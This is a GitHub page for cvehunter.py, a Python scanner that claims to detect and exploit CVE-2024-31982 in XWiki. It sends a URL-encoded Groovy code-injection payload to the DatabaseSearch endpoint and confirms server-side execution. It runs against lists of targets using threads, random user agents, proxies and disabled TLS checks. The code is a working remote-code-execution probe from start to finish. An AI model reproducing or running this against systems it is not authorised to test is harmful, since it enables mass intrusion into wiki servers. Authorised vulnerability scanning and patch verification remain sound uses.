-
Notifications
You must be signed in to change notification settings - Fork 0
/
cvehunter.py
196 lines (159 loc) · 6.97 KB
/
cvehunter.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
import asyncio
import argparse
import aiofiles
from alive_progress import alive_bar
import warnings
from fake_useragent import UserAgent
from colorama import Fore, Style
from bs4 import XMLParsedAsHTMLWarning, MarkupResemblesLocatorWarning
from bs4 import BeautifulSoup
import ssl
import httpx
import random
import os
green = Fore.GREEN
magenta = Fore.MAGENTA
cyan = Fore.CYAN
mixed = Fore.RED + Fore.BLUE
red = Fore.RED
blue = Fore.BLUE
yellow = Fore.YELLOW
white = Fore.WHITE
reset = Style.RESET_ALL
bold = Style.BRIGHT
colors = [ green, cyan, blue]
random_color = random.choice(colors)
def banner():
banner=f"""{bold}{random_color}
____ __ __ _____ _ _ _
/ ___|\ \ / /| ____|| | | | _ _ _ __ | |_ ___ _ __
| | \ \ / / | _| | |_| || | | || '_ \ | __| / _ \| '__|
| |___ \ V / | |___ | _ || |_| || | | || |_ | __/| |
\____| \_/ |_____||_| |_| \__,_||_| |_| \__| \___||_|
CVE-2024-31982 {bold}{white}@th3gokul{reset}\n"""
return banner
print (banner())
parser = argparse.ArgumentParser(description=f"[{bold}{blue}Description{reset}]: {bold}{white}Vulnerability Detection and Exploitation tool for CVE-2024-31982" , usage=argparse.SUPPRESS)
parser.add_argument("-u", "--url", type=str, help=f"[{bold}{blue}INF{reset}]: {bold}{white}Specify a URL or domain for vulnerability detection")
parser.add_argument("-l", "--list", type=str, help=f"[{bold}{blue}INF{reset}]: {bold}{white}Specify a list of URLs for vulnerability detection")
parser.add_argument("-t", "--threads", type=int, default=1, help=f"[{bold}{blue}INF{reset}]: {bold}{white}Number of threads for list of URLs")
parser.add_argument("-proxy", "--proxy", type=str, help=f"[{bold}{blue}INF{reset}]: {bold}{white}Proxy URL to send request via your proxy")
parser.add_argument("-v", "--verbose", action="store_true", help=f"[{bold}{blue}INF{reset}]: {bold}{white}Increases verbosity of output in console")
parser.add_argument("-o", "--output", type=str, help=f"[{bold}{blue}INF{reset}]: {bold}{white}Filename to save output of vulnerable target{reset}]")
args=parser.parse_args()
async def save(result):
try:
if args.output:
if os.path.isfile(args.output):
filename = args.output
elif os.path.isdir(args.output):
filename = os.path.join(args.output, f"results.txt")
else:
filename = args.output
else:
filename = "results.txt"
async with aiofiles.open(filename, "a") as w:
await w.write(result + '\n')
except KeyboardInterrupt as e:
quit()
except asyncio.CancelledError as e:
SystemExit
except Exception as e:
pass
async def exploit(session,url,sem,bar):
try:
base_url=f'{url}/xwiki/bin/get/Main/DatabaseSearch?outputSyntax=plain&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22Hello%20from%22%20%2B%20%22%20search%20text%3A%22%20%2B%20%2823%20%2B%2019%29%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D%20'
header={
"User-Agent": UserAgent().random
}
async with session.stream("GET", base_url, headers=header , follow_redirects=True , timeout=30) as response:
response = await response.aread()
response = response.decode("utf-8")
with warnings.catch_warnings():
warnings.filterwarnings("ignore", category=UserWarning)
warnings.filterwarnings('ignore', category=XMLParsedAsHTMLWarning)
warnings.filterwarnings("ignore", category=MarkupResemblesLocatorWarning)
soup = BeautifulSoup(response, "html.parser",from_encoding="iso-8859-1")
title_tags = soup.title
title = title_tags.string if title_tags else ""
if "Hello from search text:42" in title:
print(f"{bold}{white}[vuln]: {url}{reset}")
await save(f"Vulnerable: {base_url}")
except (httpx.ConnectError, httpx.RequestError, httpx.TimeoutException) as e:
if args.verbose:
print(f"[{bold}{red}Timeout{reset}]: {bold}{white}{url}{reset}")
except ssl.SSLError as e:
pass
except httpx.InvalidURL:
pass
except KeyboardInterrupt :
SystemExit
except asyncio.CancelledError:
SystemExit
except Exception as e:
if args.verbose:
print(f"Exception in exploit: {e}, {type(e)}")
finally:
bar()
sem.release()
async def loader(urls, session, sem, bar):
try:
tasks = []
for url in urls:
await sem.acquire()
task = asyncio.ensure_future(exploit(session, url, sem, bar))
tasks.append(task)
await asyncio.gather(*tasks, return_exceptions=False)
except KeyboardInterrupt as e:
SystemExit
except asyncio.CancelledError as e:
SystemExit
except Exception as e:
if args.verbose:
print(f"Exception in loader: {e}, {type(e)}")
async def threads(urls):
try:
urls = list(set(urls))
sem = asyncio.BoundedSemaphore(args.threads)
proxy = args.proxy if args.proxy else None
async with httpx.AsyncClient(verify=False, proxy=proxy) as session:
with alive_bar(title=f"CVEHunter", total=len(urls), enrich_print=False) as bar:
await loader(urls, session, sem, bar)
except RuntimeError as e:
pass
except KeyboardInterrupt as e:
SystemExit
except Exception as e:
if args.verbose:
print(f"Exception in threads: {e}, {type(e)}")
async def main():
try:
urls = []
if args.url:
if args.url.startswith("https://") or args.url.startswith("http://"):
urls.append(args.url)
else:
new_url = f"https://{args.url}"
urls.append(new_url)
new_http = f"http://{args.url}"
urls.append(new_http)
await threads(urls)
if args.list:
async with aiofiles.open(args.list, "r") as streamr:
async for url in streamr:
url = url.strip()
if url.startswith("https://") or url.startswith("http://"):
urls.append(url)
else:
new_url = f"https://{url}"
urls.append(new_url)
new_http = f"http://{url}"
urls.append(new_http)
await threads(urls)
except FileNotFoundError as e:
print(f"[{bold}{red}WRN{reset}]: {bold}{white}{args.list} no such file or directory{reset}")
SystemExit
except Exception as e:
print(f"Exception in main: {e}, {type(e)}")
if __name__ == "__main__":
asyncio.run(main())